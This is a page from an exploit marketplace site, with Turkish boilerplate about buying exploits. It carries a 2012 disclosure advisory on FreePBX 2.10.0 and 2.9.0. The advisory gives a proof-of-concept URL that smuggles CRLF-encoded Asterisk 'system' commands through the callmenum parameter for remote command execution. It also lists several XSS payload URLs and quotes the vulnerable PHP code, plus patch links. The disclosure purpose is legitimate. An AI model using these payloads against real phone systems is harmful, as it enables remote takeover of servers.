0day.today - Dunyanin En Buyuk Exploit Veritabani
Bu konuda bilmeniz gerekenler:
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FreePBX 2.10.0, 2.9.0 Multiple Vulnerabilities
Yazar
Risk
[
Security Risk Critical
]0day-ID
Kategori
Eklenme Tarihi
Platform
Product: FreePBX Version: 2.10.0, 2.9.0 and perhaps earlier versions Type: Remote Command Execution, XSS Release Date: March 14, 2012 Vendor Notification Date: Jun 12, 2011 Author: Martin Tschirsich Overview: A remote command execution vulnerability and some XSS in current and earlier FreePBX versions due to missing input sanitization. FreePBX is a popular implementation (500,000 active phone systems) of Asterisk (telephony software) based around a web-based configuration interface and other tools. Some of these installations are on a public IP address. Proof of Concept: RCE: [HOST]/recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER] () from -internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A XSS (2.9.0 and perhaps other versions): [HOST]/panel/index_amp.php?context=[XSS] [HOST]/panel/flash/mypage.php?clid=[XSS] [HOST]/panel/flash/mypage.php?clidname=[base64_encode(XSS)] [HOST]/panel/dhtml/index.php?context=/../%00">[XSS] [HOST]/admin/views/freepbx_reload.php/"</script>[XSS] [HOST]/recordings/index.php?login='>[XSS] Details (RCE): Missing input sanitization in htdocs/recordings/misc/callme_page.php: // line 28-30: $to = $_REQUEST['callmenum']; // vulnerable $msgFrom = $_REQUEST['msgFrom']; $new_path = substr($path, 0, -4); // line 38: $call_status = callme_startcall($to, $msgFrom, $new_path); Missing input sanitization in htdocs/recordings/includes/callme.php: // line 88-117: function callme_startcall($to, $from, $new_path) { global $astman; $channel = "Local/$to () from-internal/n"; // vulnerable $context = "vm-callme"; $extension = "s"; $priority = "1"; $callerid = "VMAIL/$from"; ... /* Arguments to Originate: channel, extension, context, priority, timeout, callerid, variable, account, application, data */ $status = $astman->Originate($channel, $extension, $context, $priority, NULL, $callerid, $variable, NULL, NULL, NULL, NULL); ... } Unofficial Patch (RCE, tested with 2.9.0): Patch htdocs/recordings/modules/callme_page.php: http://pastebin.com/ZbX50qaZ Patch htdocs/recordings/modules/voicemail.module: http://pastebin.com/vv3qczfC Disclaimer: The vendor has been contacted and provided with a patch several times since Jun 12, 2011. Since no intention to address this issue was shown, I felt it was in the best interest to disclose the vulnerability. All information in this advisory is provided on an 'as is' basis in the hope that it will be useful. The author not responsible for any risks or occurrences caused by the application of this information. # 0day.today [2024-07-01] #